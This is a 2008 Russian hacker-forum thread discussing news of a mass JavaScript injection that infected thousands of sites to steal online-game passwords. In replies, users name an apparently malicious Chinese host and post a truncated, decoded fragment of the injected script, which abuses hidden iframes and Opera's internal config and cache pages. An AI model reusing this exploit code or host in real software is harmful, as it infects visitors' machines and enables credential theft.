Хакеры инфицировали тысячи веб-страниц

Discussion in 'Мировые новости. Обсуждения.' started by Nickotin, 19 Mar 2008.

  1. Nickotin

    Nickotin Elder - Старейшина

    Joined:
    15 Feb 2007
    Messages:
    84
    Likes Received:
    20
    Reputations:
    5
    Хакеры, которые занимаются кражей паролей, используемых в популярных online играх, уже заразили более 10,000 веб-страниц за последних несколько дней. веб-атака, которая была совершена с китайских серверов, была впервые замечена исследователями McAfee в среду утром. На протяжении нескольких часов компания по безопасности проследила больше чем 10,000 зараженных веб-страниц на сотнях веб-сайтов.

    McAfee пока не уверенна, как такое большое количество сайтов было взломано, но "некоторые из этих атак произошли настолько быстро, что это действительно похоже на некоторую автоматизацию", - сказал Крэйг Шмагар (Craig Schmugar) исследователь с McAfee's Avert Labs. В прошлом, нападавшие использовали поисковые движки, чтобы искать в интернете уязвимые веб-сайты, а после этого они писали автоматические утилиты, которые совершали нападения, позволяя в конечном счете преступникам использовать легальные сайты для запуска своего вредоносного кода.

    Инфицированные сайты ничем не отличаются от неинфицированных, но хакеры добавили небольшой код JavaScript, который перенаправляет браузеры посетителей под невидимую атаку, осуществляемую с китайских серверов. Та же самая техника нападения была использована год назад, когда хакеры инфицировали сайты Miami Dolphins и Dolphins Stadium как раз перед футбольной игрой 2007 Super Bowl XLI.

    Если выполнение кода произошло успешно, на компьютере жертвы устанавливается программа, которая крадет пароли от известных сетевых игр, включая таких, как Lord of the Rings.
     
  2. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    У них сплоит оч хороший :) Вчера нарвался на их фрейм.
     
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    >> У них сплоит оч хороший Вчера нарвался на их фрейм.
    Дай ссылку на сайт протрояненный
     
  4. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    McAfee это средний род. А не женский.
    Давай-ка фрейм сюда. И как ты узнал, что это китайцы?
    не доработка ==> пишетсявместе.
     
  5. xdx

    xdx Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    91
    Likes Received:
    24
    Reputations:
    3
    _http://webm0nster.cn/banners/index.php вот помойму это ссылка на _http://forum.worldofwarcraft.ru висят 3 фрейма кстати атака происходит когда только для уников которые сидят под IE =)
     
  6. gold-goblin

    gold-goblin Elder - Старейшина

    Joined:
    26 Mar 2007
    Messages:
    917
    Likes Received:
    174
    Reputations:
    3
    Вот код

     
  7. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    В разкодированном виде этот фуфел имеет следующий вид:

    Code:
    blank_iframe = document.createElement('iframe');
    blank_iframe.src = 'about:blank';
    blank_iframe.setAttribute('id', 'blank_iframe_window');
    blank_iframe.setAttribute('style', 'display:none');
    document.appendChild(blank_iframe);
    blank_iframe_window.eval("config_iframe = document.createElement('iframe');\config_iframe.setAttribute('id', 'config_iframe_window');\config_iframe.src = 'opera:config';\document.appendChild(config_iframe);\app_iframe = document.createElement('script');\cache_iframe = document.createElement('iframe');\app_iframe.src = '';\app_iframe.onload = function ()\{\cache_iframe.src = 'opera:cache';\cache_iframe.onload = function ()\{\cache = cache_iframe.contentDocument.childNodes[0.innerHTML.toUpperCase();\var re = new RegExp('(OPR\\w{5}.EXE)\\s*\\d+\\s*
     
  8. gold-goblin

    gold-goblin Elder - Старейшина

    Joined:
    26 Mar 2007
    Messages:
    917
    Likes Received:
    174
    Reputations:
    3
    Которые под оперой сидят.....
    (я под оперой зашол......
    капец моим поролям =)
     
  9. Nickotin

    Nickotin Elder - Старейшина

    Joined:
    15 Feb 2007
    Messages:
    84
    Likes Received:
    20
    Reputations:
    5
    походу ппц)
     
  10. ртуть

    ртуть Elder - Старейшина

    Joined:
    31 Aug 2007
    Messages:
    314
    Likes Received:
    389
    Reputations:
    29
    js отключите и все )
    китайцы впереди планеты все ))) синь-синь-хуааа супа хака
     
Loading...